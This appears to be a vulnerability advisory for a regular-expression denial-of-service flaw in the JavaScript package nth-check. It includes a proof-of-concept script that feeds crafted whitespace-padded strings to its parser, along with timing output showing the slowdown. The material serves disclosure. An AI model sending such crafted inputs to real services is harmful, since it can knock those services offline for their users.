There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern `\s*(?:([+-]?)\s*(\d+))?` with quantified overlapping adjacency and can be exploited with the following code.**Proof of Concept**```js// PoC.jsvar nthCheck = require("nth-check")for(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = '2n' + ' '.repeat(i*10000)+"!"; try { nthCheck.parse(attack_str) } catch(err) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") }}```**The Output**```attack_str.length: 10003: 174 msattack_str.length: 20003: 1427 msattack_str.length: 30003: 2602 msattack_str.length: 40003: 4378 msattack_str.length: 50003: 7473 ms```